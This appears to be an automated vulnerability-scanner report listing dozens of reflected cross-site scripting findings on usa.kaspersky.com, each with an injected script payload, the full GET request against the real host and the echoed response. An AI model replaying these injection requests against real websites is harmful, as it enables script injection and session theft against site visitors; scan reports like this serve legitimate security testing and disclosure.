The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"><script>alert(1)</script>72b7766c221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0711"><script>alert(1)</script>9f904e9ecf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virusf0711"><script>alert(1)</script>9f904e9ecf9" /> ...[SNIP]...
1.159. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/search/apachesolr_search/far%20help%20virus
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f435"><script>alert(1)</script>c27525afe55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28500"><script>alert(1)</script>1b71febd288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search28500"><script>alert(1)</script>1b71febd288/apachesolr_search/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ae97"-alert(1)-"6f128e7c3a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search6ae97"-alert(1)-"6f128e7c3a8/apachesolr_search/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e31"><script>alert(1)</script>dd86b28eecc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_searchc9e31"><script>alert(1)</script>dd86b28eecc/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e5"><script>alert(1)</script>ba42b202e41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41" /> ...[SNIP]...
1.164. http://usa.kaspersky.com/search/apachesolr_search/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/search/apachesolr_search/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d0b"><script>alert(1)</script>be3c5cc808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_search/index.html?d3d0b"><script>alert(1)</script>be3c5cc808=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ede6"><script>alert(1)</script>33cc4e8f02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af2e6"-alert(1)-"2ac881d387c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d30"><script>alert(1)</script>1c2b9503e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f302c"><script>alert(1)</script>4c19078928f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/xssf302c"><script>alert(1)</script>4c19078928f" /> ...[SNIP]...
1.169. http://usa.kaspersky.com/search/apachesolr_search/xss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/search/apachesolr_search/xss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ef0"><script>alert(1)</script>70160970dfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a65a4"-alert(1)-"2aa5ec6e5f1 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.cssa65a4"-alert(1)-"2aa5ec6e5f1?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058e"><script>alert(1)</script>98cdc6b835d was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css8058e"><script>alert(1)</script>98cdc6b835d?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45325"><script>alert(1)</script>c89d0f96b80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites45325"><script>alert(1)</script>c89d0f96b80/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50a3f"-alert(1)-"80bc3e9188a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites50a3f"-alert(1)-"80bc3e9188a/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cc5"-alert(1)-"19bcc8754ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all42cc5"-alert(1)-"19bcc8754ee/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e94c"><script>alert(1)</script>8ee69f6e42a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all8e94c"><script>alert(1)</script>8ee69f6e42a/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84fcc"-alert(1)-"e3f22eec311 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes84fcc"-alert(1)-"e3f22eec311/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ecf9"><script>alert(1)</script>35fe4c3edad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes2ecf9"><script>alert(1)</script>35fe4c3edad/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb2c"-alert(1)-"defda43c72b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zenacb2c"-alert(1)-"defda43c72b/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b57"><script>alert(1)</script>1399bdc859f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zenf4b57"><script>alert(1)</script>1399bdc859f/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55622"><script>alert(1)</script>5993aee8954 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme55622"><script>alert(1)</script>5993aee8954/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9524"-alert(1)-"162f95c534c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usathemef9524"-alert(1)-"162f95c534c/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d980"><script>alert(1)</script>bb34429b864 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom8d980"><script>alert(1)</script>bb34429b864/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad070"-alert(1)-"0a6f9a5e76e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/customad070"-alert(1)-"0a6f9a5e76e/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc898"><script>alert(1)</script>be3f789ebb4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modulesdc898"><script>alert(1)</script>be3f789ebb4/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 108f3"-alert(1)-"554f67a870 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules108f3"-alert(1)-"554f67a870/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10988"-alert(1)-"4ffcedf6e1d was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock10988"-alert(1)-"4ffcedf6e1d/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a097"><script>alert(1)</script>1622e582d22 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock3a097"><script>alert(1)</script>1622e582d22/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b2a7"><script>alert(1)</script>deb52bb8ed4 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home6b2a7"><script>alert(1)</script>deb52bb8ed4/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44d98"-alert(1)-"3bfb65bc033 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home44d98"-alert(1)-"3bfb65bc033/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05ea"-alert(1)-"447b63679fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6348"><script>alert(1)</script>ef3152fde57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77e65"-alert(1)-"1a4299fe725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50668"><script>alert(1)</script>7026b070ce2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a958e"><script>alert(1)</script>d6121ecfb71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc9f8"-alert(1)-"8fb20bcae2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a76"><script>alert(1)</script>728f084259e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
